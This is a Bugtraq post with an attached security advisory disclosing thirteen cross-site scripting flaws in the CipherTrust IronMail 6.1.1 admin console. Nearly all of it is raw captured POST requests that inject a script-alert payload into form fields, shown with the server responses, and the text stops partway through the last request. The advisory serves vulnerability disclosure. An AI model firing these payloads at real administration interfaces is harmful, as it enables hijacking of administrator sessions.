Multiple XSS in IronMail

Board: Bugtraq | Posted: 2007/03/27 01:08
Found multiple XSS in IronMail. See attached advisory. Spanish version at http://www.514.es.

Regards,
- J

[Attachment: SIAADV-07-004-EN.txt]

=============================== - Advisory - ===============================

Title:  Multiple XSS in CipherTrust IronMail 6.1.1
Risk:   Medium
Date:   20.Feb.2007
Author: Javier Olascoaga <jolascoaga *at* 514.es>
WEB:    http://www.514.es/

.: [ INTRO ] :.

IronMail protects enterprise email systems from inbound threats: spam, viruses; or hackers trying to take down or take over the e-mail system. IronMail protects enterprise email systems from outbound threats: regulatory compliance violations, corporate policy violations, or theft ("leakage") of confidential information or intellectual property. IronMail protects enterprise email systems from threats that haven't even been identified yet.

.: [ TECHNICAL DESCRIPTION ] :.

During technical tests against the IronMail mail system, several Cross Site Scripting vulnerabilities were detected in the administration console of the product. The XSS found are listed below:

.: [ XSS #1 ] :.

POST https://172.0.0.2:10443/admin/systemRouting.do?method=submit HTTP/1.1
Referer: https://172.0.0.2:10443/admin/systemRouting.do?method=init&isMenuToggled=1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322) Paros/3.2.13
Host: 172.0.0.2:10443
Content-Length: 295
Cache-Control: no-cache
Cookie: CTSecureToken=53DFBE4753D221B2707050E96902E98D_admin; itemToHighlight=https%3A//172.0.0.2%3A10443/admin/systemRouting.do%3Fmethod%3Dinit%26isMenuToggled%3D1; menusToExpand=%2CConfigurationMenu%2C; tabbedMenuSelected=11; /admin/queueManager.dofirsttimeload=1; /admin/queueManager.do=; JSESSIONID=B227892A258E91419C09469E49AED4D4

'rows%5B0%5D.networkId=172.16.0.0&rows%5B0%5D.netmaskId=255.255.0.0&rows%5B1%5D.networkId=192.168.0.0&rows%5B1%5D.netmaskId=255.255.0.0&network=%27%3E%3Cscript%3Ealert%28%27SIA%27%29%3C%2Fscript%3E&netmask=128.0.0.0&defRouterIp=%27%3E%3Cscript%3Ealert%28%27SIA2%27%29%3C%2Fscript%3E&submit=Submit

.: [ XSS #2 ] :.

POST https://172.0.0.2:10443/admin/system_IronMail.do?method=saveNew HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Referer: https://172.0.0.2:10443/admin/system_IronMail.do?method=getDetail&isMenuToggled=1
Accept-Language: es-ES,en-us;q=0.5
Content-Type: application/x-www-form-urlencoded
UA-CPU: x86
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322) Paros/3.2.13
Host: 172.0.0.2:10443
Content-Length: 343
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: CTSecureToken=2B59F89A721290CD7E7E0774CDB4A3FE_admin; tabbedMenuSelected=17; itemToHighlight=https%3A//172.0.0.2%3A10443/admin/system_IronMail.do%3Fmethod%3DgetDetail%26isMenuToggled%3D1; menusToExpand=%2CConfigurationMenu%2C; JSESSIONID=5A6DABFA0209D0BEC17AF6841DEA184E

Wmtu=1500&hostName=%27%3E%3Cscript%3Ealert%28%27SIA%27%29%3C%2Fscript%3E&domainName=sytes.net&ipAddress=10.1.1.1&ipNetMask=255.255.255.224&defaultRouter=10.1.1.2&dns1=10.1.1.3&dns2=10.1.1.4&dns3=10.1.1.5&ntp1=time.nist.gov&ntp2=bitsy.mit.edu&ntp3=clock.isc.org&timeZone=Europe%2FMadrid&ethernetSetting=autoselect&submit=Submit

HTTP/1.0 200 OK
Date: Mon, 19 Feb 2007 10:11:46 GMT
Server: Apache
Pragma: no-cache
Cache-Control: no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Connection: close
Content-Type: text/html; charset=utf-8

.: [ XSS #3 ] :.

POST https://172.0.0.2:10443/admin/system_IronMail.do?method=saveNew HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Referer: https://172.0.0.2:10443/admin/system_IronMail.do?method=saveNew
Accept-Language: es-ES,en-us;q=0.5
Content-Type: application/x-www-form-urlencoded
UA-CPU: x86
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322) Paros/3.2.13
Host: 172.0.0.2:10443
Content-Length: 341
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: CTSecureToken=2B59F89A721290CD7E7E0774CDB4A3FE_admin; tabbedMenuSelected=17; itemToHighlight=https%3A//172.0.0.2%3A10443/admin/system_IronMail.do%3Fmethod%3DsaveNew; menusToExpand=%2CConfigurationMenu%2C; JSESSIONID=5A6DABFA0209D0BEC17AF6841DEA184E

Umtu=1500&hostName=mmail11&domainName=%27%3E%3Cscript%3Ealert%28%27SIA%27%29%3C%2Fscript%3E&ipAddress=10.1.1.1&ipNetMask=255.255.255.224&defaultRouter=10.1.1.2&dns1=10.1.1.3&dns2=10.1.1.4&dns3=10.1.1.5&ntp1=time.nist.gov&ntp2=bitsy.mit.edu&ntp3=clock.isc.org&timeZone=Europe%2FMadrid&ethernetSetting=autoselect&submit=Submit

HTTP/1.0 200 OK
Date: Mon, 19 Feb 2007 10:12:26 GMT
Server: Apache
Pragma: no-cache
Cache-Control: no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Connection: close
Content-Type: text/html; charset=utf-8

.: [ XSS #4 ] :.

POST https://172.0.0.2:10443/admin/system_IronMail.do?method=saveNew HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Referer: https://172.0.0.2:10443/admin/system_IronMail.do?method=saveNew
Accept-Language: es-ES,en-us;q=0.5
Content-Type: application/x-www-form-urlencoded
UA-CPU: x86
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322) Paros/3.2.13
Host: 172.0.0.2:10443
Content-Length: 337
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: CTSecureToken=2B59F89A721290CD7E7E0774CDB4A3FE_admin; tabbedMenuSelected=17; itemToHighlight=https%3A//172.0.0.2%3A10443/admin/system_IronMail.do%3Fmethod%3DsaveNew; menusToExpand=%2CConfigurationMenu%2C; JSESSIONID=5A6DABFA0209D0BEC17AF6841DEA184E

Qmtu=1500&hostName=mmail11&domainName=sytes.net&ipAddress=%27%3E%3Cscript%3Ealert%28%27SIA%27%29%3C%2Fscript%3E&ipNetMask=255.255.255.224&defaultRouter=10.1.1.2&dns1=10.1.1.3&dns2=10.1.1.4&dns3=10.1.1.5&ntp1=time.nist.gov&ntp2=bitsy.mit.edu&ntp3=clock.isc.org&timeZone=Europe%2FMadrid&ethernetSetting=autoselect&submit=Submit

HTTP/1.0 200 OK
Date: Mon, 19 Feb 2007 10:12:31 GMT
Server: Apache
Pragma: no-cache
Cache-Control: no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Connection: close
Content-Type: text/html; charset=utf-8

.: [ XSS #5 ] :.

POST https://172.0.0.2:10443/admin/system_IronMail.do?method=saveNew HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Referer: https://172.0.0.2:10443/admin/system_IronMail.do?method=saveNew
Accept-Language: es-ES,en-us;q=0.5
Content-Type: application/x-www-form-urlencoded
UA-CPU: x86
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322) Paros/3.2.13
Host: 172.0.0.2:10443
Content-Length: 337
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: CTSecureToken=2B59F89A721290CD7E7E0774CDB4A3FE_admin; tabbedMenuSelected=17; itemToHighlight=https%3A//172.0.0.2%3A10443/admin/system_IronMail.do%3Fmethod%3DsaveNew; menusToExpand=%2CConfigurationMenu%2C; JSESSIONID=5A6DABFA0209D0BEC17AF6841DEA184E

Qmtu=1500&hostName=mmail11&domainName=sytes.net&ipAddress=10.1.1.1&ipNetMask=255.255.255.224&defaultRouter=%27%3E%3Cscript%3Ealert%28%27SIA%27%29%3C%2Fscript%3E&dns1=10.1.1.3&dns2=10.1.1.4&dns3=10.1.1.5&ntp1=time.nist.gov&ntp2=bitsy.mit.edu&ntp3=clock.isc.org&timeZone=Europe%2FMadrid&ethernetSetting=autoselect&submit=Submit

HTTP/1.0 200 OK
Date: Mon, 19 Feb 2007 10:12:36 GMT
Server: Apache
Pragma: no-cache
Cache-Control: no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Connection: close
Content-Type: text/html; charset=utf-8

.: [ XSS #6 ] :.

POST https://172.0.0.2:10443/admin/system_IronMail.do?method=saveNew HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Referer: https://172.0.0.2:10443/admin/system_IronMail.do?method=saveNew
Accept-Language: es-ES,en-us;q=0.5
Content-Type: application/x-www-form-urlencoded
UA-CPU: x86
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322) Paros/3.2.13
Host: 172.0.0.2:10443
Content-Length: 338
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: CTSecureToken=2B59F89A721290CD7E7E0774CDB4A3FE_admin; tabbedMenuSelected=17; itemToHighlight=https%3A//172.0.0.2%3A10443/admin/system_IronMail.do%3Fmethod%3DsaveNew; menusToExpand=%2CConfigurationMenu%2C; JSESSIONID=5A6DABFA0209D0BEC17AF6841DEA184E

Rmtu=1500&hostName=mmail11&domainName=sytes.net&ipAddress=10.1.1.1&ipNetMask=255.255.255.224&defaultRouter=10.1.1.2&dns1=%27%3E%3Cscript%3Ealert%28%27SIA%27%29%3C%2Fscript%3E&dns2=10.1.1.4&dns3=10.1.1.5&ntp1=time.nist.gov&ntp2=bitsy.mit.edu&ntp3=clock.isc.org&timeZone=Europe%2FMadrid&ethernetSetting=autoselect&submit=Submit

HTTP/1.0 200 OK
Date: Mon, 19 Feb 2007 10:12:41 GMT
Server: Apache
Pragma: no-cache
Cache-Control: no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Connection: close
Content-Type: text/html; charset=utf-8

.: [ XSS #7 ] :.

POST https://172.0.0.2:10443/admin/system_IronMail.do?method=saveNew HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Referer: https://172.0.0.2:10443/admin/system_IronMail.do?method=saveNew
Accept-Language: es-ES,en-us;q=0.5
Content-Type: application/x-www-form-urlencoded
UA-CPU: x86
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322) Paros/3.2.13
Host: 172.0.0.2:10443
Content-Length: 340
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: CTSecureToken=2B59F89A721290CD7E7E0774CDB4A3FE_admin; tabbedMenuSelected=17; itemToHighlight=https%3A//172.0.0.2%3A10443/admin/system_IronMail.do%3Fmethod%3DsaveNew; menusToExpand=%2CConfigurationMenu%2C; JSESSIONID=5A6DABFA0209D0BEC17AF6841DEA184E

Tmtu=1500&hostName=mmail11&domainName=sytes.net&ipAddress=10.1.1.1&ipNetMask=255.255.255.224&defaultRouter=10.1.1.2&dns1=10.1.1.3&dns2=%27%3E%3Cscript%3Ealert%28%27SIA%27%29%3C%2Fscript%3E&dns3=10.1.1.5&ntp1=time.nist.gov&ntp2=bitsy.mit.edu&ntp3=clock.isc.org&timeZone=Europe%2FMadrid&ethernetSetting=autoselect&submit=Submit

HTTP/1.0 200 OK
Date: Mon, 19 Feb 2007 10:12:48 GMT
Server: Apache
Pragma: no-cache
Cache-Control: no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Connection: close
Content-Type: text/html; charset=utf-8

.: [ XSS #8 ] :.

POST https://172.0.0.2:10443/admin/systemOutOfBand.do?method=saveNew HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Referer: https://172.0.0.2:10443/admin/systemOutOfBand.do?method=getDetail&isMenuToggled=1
Accept-Language: es-ES,en-us;q=0.5
Content-Type: application/x-www-form-urlencoded
UA-CPU: x86
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322) Paros/3.2.13
Host: 172.0.0.2:10443
Content-Length: 154
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: CTSecureToken=2B59F89A721290CD7E7E0774CDB4A3FE_admin; tabbedMenuSelected=17; itemToHighlight=https%3A//172.0.0.2%3A10443/admin/systemOutOfBand.do%3Fmethod%3DgetDetail%26isMenuToggled%3D1; menusToExpand=%2CConfigurationMenu%2C; JSESSIONID=5A6DABFA0209D0BEC17AF6841DEA184E

outOfBand=true&mtu=1500&ipAddress=%27%3E%3Cscript%3Ealert%28%27SIA%27%29%3C%2Fscript%3E&ethernetSetting=autoselect&ipNetMask=255.255.255.224&submit=Submit

HTTP/1.0 200 OK
Date: Mon, 19 Feb 2007 10:13:16 GMT
Server: Apache
Pragma: no-cache
Cache-Control: no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Connection: close
Content-Type: text/html; charset=utf-8

.: [ XSS #9 ] :.

POST https://172.0.0.2:10443/admin/systemBackup.do?method=submit HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Referer: https://172.0.0.2:10443/admin/systemBackup.do?method=init&isMenuToggled=1
Accept-Language: es-ES,en-us;q=0.5
Content-Type: application/x-www-form-urlencoded
UA-CPU: x86
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322) Paros/3.2.13
Host: 172.0.0.2:10443
Content-Length: 146
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: CTSecureToken=2B59F89A721290CD7E7E0774CDB4A3FE_admin; tabbedMenuSelected=17; itemToHighlight=https%3A//172.0.0.2%3A10443/admin/systemBackup.do%3Fmethod%3Dinit%26isMenuToggled%3D1; menusToExpand=%2CConfigurationMenu%2C; JSESSIONID=5A6DABFA0209D0BEC17AF6841DEA184E

password=%27%3E%3Cscript%3Ealert%28%27SIA%27%29%3C%2Fscript%3E&confirmPassword=%27%3E%3Cscript%3Ealert%28%27SIA%27%29%3C%2Fscript%3E&submit=Submit

HTTP/1.0 200 OK
Date: Mon, 19 Feb 2007 10:13:41 GMT
Server: Apache
Pragma: no-cache
Cache-Control: no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Connection: close
Content-Type: text/html; charset=utf-8

.: [ XSS #10 ] :.

POST https://172.0.0.2:10443/admin/systemLicenseManager.do?method=submit HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Referer: https://172.0.0.2:10443/admin/systemLicenseManager.do?method=init&isMenuToggled=1
Accept-Language: es-ES,en-us;q=0.5
Content-Type: application/x-www-form-urlencoded
UA-CPU: x86
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322) Paros/3.2.13
Host: 172.0.0.2:10443
Content-Length: 75
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: CTSecureToken=2B59F89A721290CD7E7E0774CDB4A3FE_admin; tabbedMenuSelected=17; itemToHighlight=https%3A//172.0.0.2%3A10443/admin/systemLicenseManager.do%3Fmethod%3Dinit%26isMenuToggled%3D1; menusToExpand=%2CConfigurationMenu%2C; JSESSIONID=5A6DABFA0209D0BEC17AF6841DEA184E

Klicense=%27%3E%3Cscript%3Ealert%28%27SIA%27%29%3C%2Fscript%3E&submit=Submit

HTTP/1.0 200 OK
Date: Mon, 19 Feb 2007 10:20:28 GMT
Server: Apache
Pragma: no-cache
Cache-Control: no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Connection: close
Content-Type: text/html; charset=utf-8

.: [ XSS #11 ] :.

POST https://172.0.0.2:10443/admin/systemWebAdminConfig.do?method=save HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Referer: https://172.0.0.2:10443/admin/systemWebAdminConfig.do?method=init&isMenuToggled=1&procId=90
Accept-Language: es-ES,en-us;q=0.5
Content-Type: application/x-www-form-urlencoded
UA-CPU: x86
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322) Paros/3.2.13
Host: 172.0.0.2:10443
Content-Length: 1225
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: CTSecureToken=2B59F89A721290CD7E7E0774CDB4A3FE_admin; tabbedMenuSelected=15; itemToHighlight=https%3A//172.0.0.2%3A10443/admin/systemWebAdminConfig.do%3Fmethod%3Dinit%26isMenuToggled%3D1%26procId%3D90; menusToExpand=%2CConfigurationMenu%2CWebAdminConfigurationMenu%2CUserAccountMenu%2C; JSESSIONID=5A6DABFA0209D0BEC17AF6841DEA184E

procId=90&rows%5B0%5D.attrName=gui_log_level&rows%5B0%5D.attrType=12&rows%5B0%5D.attrValidate=%5BLabelValueBean%5BCRITICAL%2C+1%5D%2C+LabelValueBean%5BERROR%2C+4%5D%2C+LabelValueBean%5BINFORMATION%2C+5%5D%2C+LabelValueBean%5BDETAILED%2C+6%5D%5D&rows%5B0%5D.attrValidateStr=30060003%3A1%2C30060004%3A4%2C30060005%3A5%2C30060006%3A6&rows%5B0%5D.attrDepends=&rows%5B0%5D.multipleValue=0&rows%5B0%5D.modifyable=true&rows%5B0%5D.attrValueStrClone=4&rows%5B0%5D.langTagId=2000003&rows%5B0%5D.attrValue=4&rows%5B1%5D.attrName=gui_timeout&rows%5B1%5D.attrType=2&rows%5B1%5D.attrValidate=%5B1-30%5D&rows%5B1%5D.attrValidateStr=%5B1-30%5D&rows%5B1%5D.attrDepends=&rows%5B1%5D.multipleValue=0&rows%5B1%5D.modifyable=true&rows%5B1%5D.attrValueStrClone=30&rows%5B1%5D.langTagId=2001014&rows%5B1%5D.attrValueStr=%27%3E%3Cscript%3Ealert%28%27SIA%27%29%3C%2Fscript%3E&rows%5B2%5D.attrName=auto_refresh&rows%5B2%5D.attrType=2&rows%5B2%5D.attrValidate=%5B1-30%5D&rows%5B2%5D.attrValidateStr=%5B1-30%5D&rows%5B2%5D.attrDepends=&rows%5B2%5D.multipleValue=0&rows%5B2%5D.modifyable=true&rows%5B2%5D.attrValueStrClone=4&rows%5B2%5D.langTagId=2001017&rows%5B2%5D.attrValueStr=%27%3E%3Cscript%3Ealert%28%27SIA2%27%29%3C%2Fscript%3E&submitValue=Submit

HTTP/1.0 200 OK
Date: Mon, 19 Feb 2007 10:21:27 GMT
Server: Apache
Pragma: no-cache
Cache-Control: no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Connection: close
Content-Type: text/html; charset=utf-8

.: [ XSS #12 ] :.

POST https://172.0.0.2:10443/admin/ldap_ConfigureServiceProperties.do?method=save HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Referer: https://172.0.0.2:10443/admin/ldap_ConfigureServiceProperties.do?method=init&procId=164
Accept-Language: es-ES,en-us;q=0.5
Content-Type: application/x-www-form-urlencoded
UA-CPU: x86
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322) Paros/3.2.13
Host: 172.0.0.2:10443
Content-Length: 2840
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: CTSecureToken=2B59F89A721290CD7E7E0774CDB4A3FE_admin; tabbedMenuSelected=11; itemToHighlight=https%3A//172.0.0.2%3A10443/admin/ldap_ConfigureServiceProperties.do%3Fmethod%3Dinit%26procId%3D164; menusToExpand=%2CConfigurationMenu%2CWebAdminConfigurationMenu%2CUserAccountMenu%2CUserPreferenceMenu%2CAlertManagerMenu%2CMailFirewallMenu%2CLDAPConfigurationMenu%2C; /admin/dnsProtection.dofirsttimeload=1; /admin/dnsProtection.do=; JSESSIONID=5A6DABFA0209D0BEC17AF6841DEA184E

procId=164&rows%5B0%5D.attrName=sync_time&rows%5B0%5D.attrType=2&rows%5B0%5D.attrValidate=%5B1-24%5D&rows%5B0%5D.attrValidateStr=%5B1-24%5D&rows%5B0%5D.attrDepends=&rows%5B0%5D.multipleValue=0&rows%5B0%5D.modifyable=true&rows%5B0%5D.attrValueStrClone=24&rows%5B0%5D.langTagId=2016401&rows%5B0%5D.attrValueStr=%27%3E%3Cscript%3Ealert%28%27SIA%27%29%3C%2Fscript%3E&rows%5B1%5D.attrName=sync_results_count&rows%5B1%5D.attrType=2&rows%5B1%5D.attrValidate=%5B1-500%5D&rows%5B1%5D.attrValidateStr=%5B1-500%5D&rows%5B1%5D.attrDepends=&rows%5B1%5D.multipleValue=0&rows%5B1%5D.modifyable=true&rows%5B1%5D.attrValueStrClone=50&rows%5B1%5D.langTagId=2016402&rows%5B1%5D.attrValueStr=50&rows%5B2%5D.attrName=sync_rules_order&rows%5B2%5D.attrType=1&rows%5B2%5D.attrValidate=&rows%5B2%5D.attrValidateStr=&rows%5B2%5D.attrDepends=&rows%5B2%5D.multipleValue=1&rows%5B2%5D.modifyable=true&rows%5B2%5D.attrValueStrClone=&rows%5B2%5D.langTagId=2016403&rows%5B2%5D.attrValue=&rows%5B3%5D.attrName=ldap_fail_open&rows%5B3%5D.attrType=5&rows%5B3%5D.attrValidate=&rows%5B3%5D.attrValidateStr=&rows%5B3%5D.attrDepends=&rows%5B3%5D.multipleValue=0&rows%5B3%5D.modifyable=true&rows%5B3%5D.attrValueStrClone=1&rows%5B3%5D.langTagId=2016404&rows%5B3%5D.attrValue=true&rows%5B4%5D.attrName=ldap_failure_count&rows%5B4%5D.attrType=2&rows%5B4%5D.attrValidate=%5B1-50%5D&rows%5B4%5D.attrValidateStr=%5B1-50%5D&rows%5B4%5D.attrDepends=&rows%5B4%5D.multipleValue=0&rows%5B4%5D.modifyable=true&rows%5B4%5D.attrValueStrClone=3&rows%5B4%5D.langTagId=2016405&rows%5B4%5D.attrValueStr=3&rows%5B5%5D.attrName=ldap_monitor_intvl&rows%5B5%5D.attrType=2&rows%5B5%5D.attrValidate=%5B1-1440%5D&rows%5B5%5D.attrValidateStr=%5B1-1440%5D&rows%5B5%5D.attrDepends=&rows%5B5%5D.multipleValue=0&rows%5B5%5D.modifyable=true&rows%5B5%5D.attrValueStrClone=5&rows%5B5%5D.langTagId=2016406&rows%5B5%5D.attrValueStr=5&rows%5B6%5D.attrName=ldap_alert_type&rows%5B6%5D.attrType=12&rows%5B6%5D.attrValidate=%5BLabelValueBean%5BNo+Alert%2C+0%5D%2C+LabelValueBean%5BRESTART%2C+1%5D%2C+LabelValueBean%5BSHUTDOWN%2C+2%5D%2C+LabelValueBean%5BCRITICAL%2C+3%5D%2C+LabelValueBean%5BERROR%2C+4%5D%2C+LabelValueBean%5BWARNING%2C+5%5D%2C+LabelValueBean%5BNOTIFICATION%2C+6%5D%2C+LabelValueBean%5BINFORMATION%2C+7%5D%5D&rows%5B6%5D.attrValidateStr=30060019%3A0%2C30060007%3A1%2C30060008%3A2%2C30060003%3A3%2C30060004%3A4%2C30060009%3A5%2C30060010%3A6%2C30060005%3A7&rows%5B6%5D.attrDepends=&rows%5B6%5D.multipleValue=0&rows%5B6%5D.modifyable=true&rows%5B6%5D.attrValueStrClone=3&rows%5B6%5D.langTagId=2016407&rows%5B6%5D.attrValue=3&rows%5B7%5D.attrName=ldap_route_aft_masq&rows%5B7%5D.attrType=5&rows%5B7%5D.attrValidate=&rows%5B7%5D.attrValidateStr=&rows%5B7%5D.attrDepends=&rows%5B7%5D.multipleValue=0&rows%5B7%5D.modifyable=true&rows%5B7%5D.attrValueStrClone=0&rows%5B7%5D.langTagId=2016408&submitValue=Submit

HTTP/1.0 200 OK
Date: Mon, 19 Feb 2007 10:22:51 GMT
Server: Apache
Pragma: no-cache
Cache-Control: no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Connection: close
Content-Type: text/html; charset=utf-8

.: [ XSS #13 ] :.

POST https://172.0.0.2:10443/admin/ldap_ConfigureServiceProperties.do?method=save HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Referer: https://172.0.0.2:10443/admin/ldap_ConfigureServiceProperties.do?method=save
Accept-Language: es-ES,en-us;q=0.5
Content-Type: application/x-www-form-urlencoded
UA-CPU: x86
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322) Paros/3.2.13
Host: 172.0.0.2:10443
Content-Length: 2840
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: CTSecureToken=2B59F89A721290CD7E7E0774CDB4A3FE_admin; tabbedMenuSelected=11; itemToHighlight=https%3A//172.0.0.2%3A10443/admin/ldap_ConfigureServiceProperties.do%3Fmethod%3Dinit%26procId%3D164; menusToExpand=%2CConfigurationMenu%2CWebAdminConfigurationMenu%2CUserAccountMenu%2CUserPreferenceMenu%2CAlertManagerMenu%2CMailFirewallMenu%2CLDAPConfigurationMenu%2C; /admin/dnsProtection.dofirsttimeload=1; /admin/dnsProtection.do=; JSESSIONID=5A6DABFA0209D0BEC17AF6841DEA184E

procId=164&rows%5B0%5D.attrName=sync_time&rows%5B0%5D.attrType=2&rows%5B0%5D.attrValidate=%5B1-24%5D&rows%5B0%5D.attrValidateStr=%5B1-24%5D&rows%5B0%5D.attrDepends=&rows%5B0%5D.multipleValue=0&rows%5B0%5D.modifyable=true&rows%5B0%5D.attrValueStrClone=24&rows%5B0%5D.langTagId=2016401&rows%5B0%5D.attrValueStr=24&rows%5B1%5D.attrName=sync_results_count&rows%5B1%5D.attrType=2&rows%5B1%5D.attrValidate=%5B1-500%5D&rows%5B1%5D.attrValidateStr=%5B1-500%5D&rows%5B1%5D.attrDepends=&rows%5B1%5D.multipleValue=0&rows%5B1%5D.modifyable=true&rows%5B1%5D.attrValueStrClone=50&rows%5B1%5D.langTagId=2016402&rows%5B1%5D.attrValueStr=%27%3E%3Cscript%3Ealert%28%27SIA%27%29%3C%2Fscript%3E&rows%5B2%5D.attrName=sync_rules_order&rows%5B2%5D.attrType=1&rows%5B2%5D.attrValidate=&rows%5B2%5D.attrValidateStr=&rows%5B2%5D.attrDepends=&rows%5B2%5D.multipleValue=1&rows%5B2%5D.modifyable=true&rows%5B2%5D.attrValueStrClone=&rows%5B2%5D.langTagId=2016403&rows%5B2%5D.attrValue=&rows%5B3%5D.attrName=ldap_fail_open&rows%5B3%5D.attrType=5&rows%5B3%5D.attrValidate=&rows%5B3%5D.attrValidateStr=&rows%5B3%5D.attrDepends=&rows%5B3%5D.multipleValue=0&rows%5B3%5D.modifyable=true&rows%5B3%5D.attrValueStrClone=1&rows%5B3%5D.langTagId=2016404&rows%5B3%5D.attrValue=true&rows%5B4%5D.attrName=ldap_failure_count&rows%5B4%5D.attrType=2&rows%5B4%5D.attrValidate=%5B1-50%5D&rows%5B4%5D.attrValidateStr=%5B1-50%5D&rows%5B4%5D.attrDepends=&rows%5B4%5D.multipleValue=0&rows%5B4%5D.modifyable=true&rows%5B4%5D.attrValueStrClone=3&rows%5B4%5D.langTagId=2016405&rows%5B4%5D.attrValueStr=3&rows%5B5%5D.attrName=ldap_monitor_intvl&rows%5B5%5D.attrType=2&rows%5B5%5D.attrValidate=%5B1-1440%5D&rows%5B5%5D.attrValidateStr=%5B1-1440%5D&rows%5B5%5D.attrDepends=&rows%5B5%5D.multipleValue=0&rows%5B5%5D.modifyable=true&rows%5B5%5D.attrValueStrClone=5&rows%5B5%5D.langTagId=2016406&rows%5B5%5D.attrValueStr=5&rows%5B6%5D.attrName=ldap_alert_type&rows%5B6%5D.attrType=12&rows%5B6%5D.attrValidate=%5BLabelValueBean%5BNo+Alert%2C+0%5D%2C+LabelValueBean%5BRESTART%2C+1%5D%2C+LabelValueBean%5BSHUTDOWN%2C+2%5D%2C+LabelValueBean%5BCRITICAL%2C+3%5D%2C+LabelValueBean%5BERROR%2C+4%5D%2C+LabelValueBean%5BWARNING%2C+5%5D%2C+LabelValueBean%5BNOTIFICATION%2C+6%5D%2C+LabelValueBean%5BINFORMATION%2C+7%5D%5D&rows%5B6%5D.attrValidateStr=30060019%3A0%2C30060007%3A1%2C30060008%3A2%2C30060003%3A3%2C30060004%3A4%2C30060009%3A5%2C30060010%3A6%2C30060005%3A7&rows%5B6%5D.attrDepends=&rows%5B6%5D.multipleValue=0&rows%5B6%5D.modifyable=true&rows%5B6%5D.attrValueStrClone=3&rows%5B6%5D.langTagId=2016407&rows%5B6%5D.attrValue=3&rows